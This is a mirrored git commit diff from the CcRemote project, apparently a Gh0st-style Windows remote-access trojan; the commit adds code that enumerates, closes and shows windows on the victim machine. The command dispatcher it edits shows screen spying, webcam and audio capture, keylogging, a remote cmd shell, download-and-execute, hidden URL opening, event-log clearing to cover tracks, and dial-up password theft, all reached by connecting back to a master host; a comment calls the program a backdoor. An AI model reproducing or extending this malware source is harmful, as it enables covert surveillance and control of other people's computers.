mirror of
https://github.com/Cc28256/CcRemote.git
synced 2025-06-08 13:29:50 +00:00
添加了服务端遍历窗口数据的代码与注释
This commit is contained in:
ChangCheng
parent
c95afb225a
commit
2cee9bb467
Binary file not shown.
@ -79,8 +79,8 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\common\shellmanager.cpp(52): warning C4996
|
||||
SystemManager.cpp
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\dialupass.h(62): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\systemmanager.cpp(119): warning C4018: “<”: 有符号/无符号不匹配
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\systemmanager.cpp(210): warning C4101: “cbNeeded”: 未引用的局部变量
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\systemmanager.cpp(137): warning C4018: “<”: 有符号/无符号不匹配
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\systemmanager.cpp(228): warning C4101: “cbNeeded”: 未引用的局部变量
|
||||
VideoCap.cpp
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\common\videocap.cpp(118): warning C4101: “gCapTureParms”: 未引用的局部变量
|
||||
VideoManager.cpp
|
||||
|
||||
@ -56,23 +56,23 @@ void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
|
||||
case COMMAND_ACTIVED:
|
||||
InterlockedExchange((LONG *)&m_bIsActived, true);
|
||||
break;
|
||||
case COMMAND_LIST_DRIVE: // 文件管理
|
||||
case COMMAND_LIST_DRIVE: // 文件管理
|
||||
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_FileManager,
|
||||
(LPVOID)m_pClient->m_Socket, 0, NULL, false);
|
||||
break;
|
||||
case COMMAND_SCREEN_SPY: // 屏幕查看
|
||||
case COMMAND_SCREEN_SPY: // 屏幕查看
|
||||
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ScreenManager,
|
||||
(LPVOID)m_pClient->m_Socket, 0, NULL, true);
|
||||
break;
|
||||
case COMMAND_WEBCAM: // 摄像头
|
||||
case COMMAND_WEBCAM: // 摄像头
|
||||
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_VideoManager,
|
||||
(LPVOID)m_pClient->m_Socket, 0, NULL);
|
||||
break;
|
||||
case COMMAND_AUDIO: // 摄像头
|
||||
case COMMAND_AUDIO: // 摄像头
|
||||
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_AudioManager,
|
||||
(LPVOID)m_pClient->m_Socket, 0, NULL);
|
||||
break;
|
||||
case COMMAND_SHELL: // 远程sehll
|
||||
case COMMAND_SHELL: // 远程shell-CMD
|
||||
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ShellManager,
|
||||
(LPVOID)m_pClient->m_Socket, 0, NULL, true);
|
||||
break;
|
||||
@ -80,39 +80,43 @@ void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
|
||||
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_KeyboardManager,
|
||||
(LPVOID)m_pClient->m_Socket, 0, NULL);
|
||||
break;
|
||||
case COMMAND_SYSTEM:
|
||||
case COMMAND_SYSTEM: // 进程
|
||||
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SystemManager,
|
||||
(LPVOID)m_pClient->m_Socket, 0, NULL);
|
||||
break;
|
||||
case COMMAND_WSLIST: // 窗口
|
||||
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_WindowManager,
|
||||
(LPVOID)m_pClient->m_Socket, 0, NULL);
|
||||
break;
|
||||
|
||||
case COMMAND_DOWN_EXEC: // 下载者
|
||||
case COMMAND_DOWN_EXEC: // 下载者
|
||||
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_DownManager,
|
||||
(LPVOID)(lpBuffer + 1), 0, NULL, true);
|
||||
Sleep(100); // 传递参数用
|
||||
Sleep(100); // 传递参数用
|
||||
break;
|
||||
case COMMAND_OPEN_URL_SHOW: // 显示打开网页
|
||||
case COMMAND_OPEN_URL_SHOW: // 显示打开网页
|
||||
OpenURL((LPCTSTR)(lpBuffer + 1), SW_SHOWNORMAL);
|
||||
break;
|
||||
case COMMAND_OPEN_URL_HIDE: // 隐藏打开网页
|
||||
case COMMAND_OPEN_URL_HIDE: // 隐藏打开网页
|
||||
OpenURL((LPCTSTR)(lpBuffer + 1), SW_HIDE);
|
||||
break;
|
||||
case COMMAND_REMOVE: // 卸载,
|
||||
case COMMAND_REMOVE: // 卸载,
|
||||
UnInstallService();
|
||||
break;
|
||||
case COMMAND_CLEAN_EVENT: // 清除日志
|
||||
case COMMAND_CLEAN_EVENT: // 清除日志
|
||||
CleanEvent();
|
||||
break;
|
||||
case COMMAND_SESSION:
|
||||
CSystemManager::ShutdownWindows(lpBuffer[1]);
|
||||
break;
|
||||
case COMMAND_RENAME_REMARK: // 改备注
|
||||
case COMMAND_RENAME_REMARK: // 改备注
|
||||
SetHostID(m_strServiceName, (LPCTSTR)(lpBuffer + 1));
|
||||
break;
|
||||
case COMMAND_UPDATE_SERVER: // 更新服务端
|
||||
case COMMAND_UPDATE_SERVER: // 更新服务端
|
||||
if (UpdateServer((char *)lpBuffer + 1))
|
||||
UnInstallService();
|
||||
break;
|
||||
case COMMAND_REPLAY_HEARTBEAT: // 回复心跳包
|
||||
case COMMAND_REPLAY_HEARTBEAT: // 回复心跳包
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
@ -17,9 +17,17 @@
|
||||
// Construction/Destruction
|
||||
//////////////////////////////////////////////////////////////////////
|
||||
|
||||
CSystemManager::CSystemManager(CClientSocket *pClient) : CManager(pClient)
|
||||
CSystemManager::CSystemManager(CClientSocket *pClient, BYTE bHow) : CManager(pClient)
|
||||
{
|
||||
SendProcessList();
|
||||
m_caseSystemIs = bHow;
|
||||
if (m_caseSystemIs == COMMAND_SYSTEM) //如果是获取进程
|
||||
{
|
||||
SendProcessList();
|
||||
}
|
||||
else if (m_caseSystemIs == COMMAND_WSLIST) //如果是获取窗口
|
||||
{
|
||||
SendWindowsList();
|
||||
}
|
||||
}
|
||||
|
||||
CSystemManager::~CSystemManager()
|
||||
@ -28,20 +36,26 @@ CSystemManager::~CSystemManager()
|
||||
}
|
||||
void CSystemManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
|
||||
{
|
||||
|
||||
SwitchInputDesktop();
|
||||
switch (lpBuffer[0])
|
||||
switch (lpBuffer[0])//这里是进程管理接收数据的函数了 判断是哪个命令
|
||||
{
|
||||
case COMMAND_PSLIST:
|
||||
SendProcessList();
|
||||
case COMMAND_PSLIST: //发送进程列表
|
||||
SendProcessList();
|
||||
break;
|
||||
case COMMAND_WSLIST:
|
||||
case COMMAND_WSLIST: //发送窗口列表
|
||||
SendWindowsList();
|
||||
break;
|
||||
case COMMAND_DIALUPASS:
|
||||
SendDialupassList();
|
||||
case COMMAND_DIALUPASS: //保留20200530
|
||||
break;
|
||||
case COMMAND_KILLPROCESS:
|
||||
case COMMAND_KILLPROCESS: //关闭进程
|
||||
KillProcess((LPBYTE)lpBuffer + 1, nSize - 1);
|
||||
case COMMAND_WINDOW_CLOSE: //关闭窗口
|
||||
CloseTheWindow(lpBuffer + 1);
|
||||
break;
|
||||
case COMMAND_WINDOW_TEST: //最大化最小化 隐藏窗口函
|
||||
ShowTheWindow(lpBuffer + 1);
|
||||
break;
|
||||
default:
|
||||
break;
|
||||
}
|
||||
@ -64,14 +78,18 @@ void CSystemManager::SendProcessList()
|
||||
void CSystemManager::SendWindowsList()
|
||||
{
|
||||
UINT nRet = -1;
|
||||
//获取窗口列表数据
|
||||
LPBYTE lpBuffer = getWindowsList();
|
||||
if (lpBuffer == NULL)
|
||||
return;
|
||||
|
||||
//发送遍历到的窗口数据
|
||||
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
|
||||
LocalFree(lpBuffer);
|
||||
}
|
||||
|
||||
|
||||
//保留20200530
|
||||
void CSystemManager::SendDialupassList()
|
||||
{
|
||||
CDialupass pass;
|
||||
@ -280,6 +298,7 @@ LPBYTE CSystemManager::getProcessList()
|
||||
return lpBuffer;
|
||||
}
|
||||
|
||||
//提权
|
||||
bool CSystemManager::DebugPrivilege(const char *PName,BOOL bEnable)
|
||||
{
|
||||
BOOL bResult = TRUE;
|
||||
@ -312,6 +331,7 @@ void CSystemManager::ShutdownWindows( DWORD dwReason )
|
||||
DebugPrivilege(SE_SHUTDOWN_NAME,FALSE);
|
||||
}
|
||||
|
||||
//窗口回调遍历所有窗口
|
||||
bool CALLBACK CSystemManager::EnumWindowsProc(HWND hwnd, LPARAM lParam)
|
||||
{
|
||||
DWORD dwLength = 0;
|
||||
@ -321,21 +341,27 @@ bool CALLBACK CSystemManager::EnumWindowsProc(HWND hwnd, LPARAM lParam)
|
||||
|
||||
char strTitle[1024];
|
||||
memset(strTitle, 0, sizeof(strTitle));
|
||||
//获取传进来的窗口句柄的标题
|
||||
GetWindowText(hwnd, strTitle, sizeof(strTitle));
|
||||
|
||||
//判断窗口是否可见,标题是否为空
|
||||
if (!IsWindowVisible(hwnd) || lstrlen(strTitle) == 0)
|
||||
return true;
|
||||
|
||||
|
||||
//如果指针为空的话申请一个堆
|
||||
//(该函数时循环的所以第二次进来就不是空的,用动态的LocalReAlloc改变堆大小实现数据都在一个堆上)
|
||||
if (lpBuffer == NULL)
|
||||
//第一次申请大小为1是因为第一字节为通知控制端标识
|
||||
lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1);
|
||||
|
||||
dwLength = sizeof(DWORD) + lstrlen(strTitle) + 1;
|
||||
dwOffset = LocalSize(lpBuffer);
|
||||
|
||||
//计算缓冲区大小
|
||||
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset + dwLength, LMEM_ZEROINIT|LMEM_MOVEABLE);
|
||||
|
||||
//获取窗口的创建者 + 两个memcpy数据结构为 创建者PID + hwnd + 窗口标题 + 0
|
||||
GetWindowThreadProcessId(hwnd, (LPDWORD)(lpBuffer + dwOffset));
|
||||
memcpy((lpBuffer + dwOffset), &hwnd, sizeof(DWORD));
|
||||
memcpy(lpBuffer + dwOffset + sizeof(DWORD), strTitle, lstrlen(strTitle) + 1);
|
||||
|
||||
*(LPBYTE *)lParam = lpBuffer;
|
||||
@ -343,6 +369,8 @@ bool CALLBACK CSystemManager::EnumWindowsProc(HWND hwnd, LPARAM lParam)
|
||||
return true;
|
||||
}
|
||||
|
||||
|
||||
//获取窗口列表数据
|
||||
LPBYTE CSystemManager::getWindowsList()
|
||||
{
|
||||
LPBYTE lpBuffer = NULL;
|
||||
@ -350,6 +378,27 @@ LPBYTE CSystemManager::getWindowsList()
|
||||
//枚举屏幕上的所有的顶层窗口,轮流地将这些窗口的句柄传递给一个应用程序定义的回调函数。
|
||||
//EnumWindows会一直进行下去,直到枚举完所有的顶层窗口,或者回调函数返回了FALSE.
|
||||
EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)&lpBuffer);
|
||||
|
||||
//数据头填充TOKEN_WSLIST主控端识别
|
||||
lpBuffer[0] = TOKEN_WSLIST;
|
||||
return lpBuffer;
|
||||
}
|
||||
|
||||
|
||||
//关闭窗口
|
||||
void CSystemManager::CloseTheWindow(LPBYTE buf)
|
||||
{
|
||||
DWORD hwnd;
|
||||
memcpy(&hwnd, buf, sizeof(DWORD)); //得到窗口句柄
|
||||
::PostMessage((HWND__ *)hwnd, WM_CLOSE, 0, 0); //向窗口发送关闭消息
|
||||
}
|
||||
|
||||
//显示窗口
|
||||
void CSystemManager::ShowTheWindow(LPBYTE buf)
|
||||
{
|
||||
DWORD hwnd;
|
||||
DWORD dHow;
|
||||
memcpy((void*)&hwnd, buf, sizeof(DWORD)); //得到窗口句柄
|
||||
memcpy(&dHow, buf + sizeof(DWORD), sizeof(DWORD)); //得到窗口处理参数
|
||||
ShowWindow((HWND__ *)hwnd, dHow);
|
||||
}
|
||||
@ -14,7 +14,7 @@
|
||||
class CSystemManager : public CManager
|
||||
{
|
||||
public:
|
||||
CSystemManager(CClientSocket *pClient);
|
||||
CSystemManager(CClientSocket *pClient, BYTE bHow);//bHow是传进来功能的标志
|
||||
virtual ~CSystemManager();
|
||||
virtual void OnReceive(LPBYTE lpBuffer, UINT nSize);
|
||||
|
||||
@ -22,6 +22,8 @@ public:
|
||||
static bool CALLBACK EnumWindowsProc( HWND hwnd, LPARAM lParam);
|
||||
static void ShutdownWindows(DWORD dwReason);
|
||||
private:
|
||||
BYTE m_caseSystemIs;//构造函数会初始化这个变量,用于区分进程或者窗口的变量
|
||||
|
||||
BOOL GetProcessFullPath(DWORD dwPID, TCHAR pszFullPath[MAX_PATH]);
|
||||
BOOL DosPathToNtPath(LPTSTR pszDosPath, LPTSTR pszNtPath);
|
||||
LPBYTE getProcessList();
|
||||
@ -30,6 +32,8 @@ private:
|
||||
void SendWindowsList();
|
||||
void SendDialupassList();
|
||||
void KillProcess(LPBYTE lpBuffer, UINT nSize);
|
||||
void ShowTheWindow(LPBYTE buf);
|
||||
void CloseTheWindow(LPBYTE buf);
|
||||
};
|
||||
|
||||
#endif // !defined(AFX_SYSTEMMANAGER_H__26C71561_C37D_44F2_B69C_DAF907C04CBE__INCLUDED_)
|
||||
|
||||
@ -110,19 +110,35 @@ DWORD WINAPI Loop_KeyboardManager(SOCKET sRemote)
|
||||
return 0;
|
||||
}
|
||||
|
||||
//进程遍历回调函数
|
||||
DWORD WINAPI Loop_SystemManager(SOCKET sRemote)
|
||||
{
|
||||
CClientSocket socketClient;
|
||||
if (!socketClient.Connect(CKernelManager::m_strMasterHost, CKernelManager::m_nMasterPort))
|
||||
return -1;
|
||||
|
||||
CSystemManager manager(&socketClient);
|
||||
CSystemManager manager(&socketClient, COMMAND_SYSTEM);
|
||||
|
||||
socketClient.run_event_loop();
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
//窗口线程回调函数
|
||||
DWORD WINAPI Loop_WindowManager(SOCKET sRemote)
|
||||
{
|
||||
CClientSocket socketClient;
|
||||
if (!socketClient.Connect(CKernelManager::m_strMasterHost, CKernelManager::m_nMasterPort))
|
||||
return -1;
|
||||
|
||||
CSystemManager manager(&socketClient, COMMAND_WSLIST);
|
||||
|
||||
socketClient.run_event_loop();
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
DWORD WINAPI Loop_DownManager(LPVOID lparam)
|
||||
{
|
||||
int nUrlLength;
|
||||
|
||||
Binary file not shown.
@ -61,6 +61,9 @@ enum
|
||||
COMMAND_WSLIST, // 窗口列表
|
||||
COMMAND_DIALUPASS, // 拨号密码
|
||||
COMMAND_KILLPROCESS, // 关闭进程
|
||||
COMMAND_WINDOW_CLOSE, // 关闭窗口
|
||||
COMMAND_WINDOW_TEST, // 操作窗口
|
||||
|
||||
COMMAND_SHELL, // cmdshell
|
||||
COMMAND_SESSION, // 会话管理(关机,重启,注销, 卸载)
|
||||
COMMAND_REMOVE, // 卸载后门
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user